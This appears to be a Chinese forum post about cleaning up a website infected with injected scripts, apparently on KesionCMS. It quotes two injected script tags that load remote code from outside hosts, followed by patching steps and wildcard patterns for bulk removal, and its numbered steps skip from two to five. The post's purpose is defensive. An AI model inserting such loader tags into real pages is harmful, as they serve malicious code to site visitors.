<script language="JavaScript" src="http://www.cuaa.net/%6De%6Dber/%6De%6Dber/file/ruxin.js" type="text/javascript" id="seraph5script5134"  ></script>

<script type="text/javascript" language="JavaScript" src="http://www.%69cxxw.com/%69mages/logo.swf" id="seraph6script2864"  ></script>

就是如此类代码，而且很多不一样，按我想也有规律可找，请问怎么样才能一次性全部清除呢？

总结一下网站挂马后的解决方法，1、下载补丁(包括windows升级补丁和科汛官方补丁)，2、快速替换还原页面，3、搜索隐藏后门文件，4、系统最好能杀一下毒。

具体操作：

一、补丁

下载一个360奇虎安全卫士，如果嫌服务器安装麻烦，可以下载绿色版，点击查杀木马，系统漏洞补丁，下载更新和安装，重启服务器。下载科汛官方6.0SP1补丁，如果你没有修改太多文件，可以备份好TEMPLATE后，直接整个目录删除后，重新上传科汛系统或补丁。5.5的修改upfilesave.asp文件或官方补丁，6.0SP1直接补就可以了。注意设置upfiles的脚本运行权限：无。论坛之前有指导为对着upfiles目录按右键设置，有些服务器系统找不到这个选项设置，可以在iis里面对着这个目录右键就有这个设置了。

二、替换还原

最终解决方法如下：三分钟搞定替换还原中马页面。首先下载ultraedit32软件，有绿色版的，14.20之类版本均可。

ultraedit点搜索，在文件中替换，选ultraedit正则，包含子目录：

搜索文档类型：*.asp;*.htm;*.html;*.js;

分别使用2次下面的正则，

第一正则：document.writeln('<script*seraph*><\/script>');
第二正则：<script*seraph*></script>

五、期待下次挂马，哈！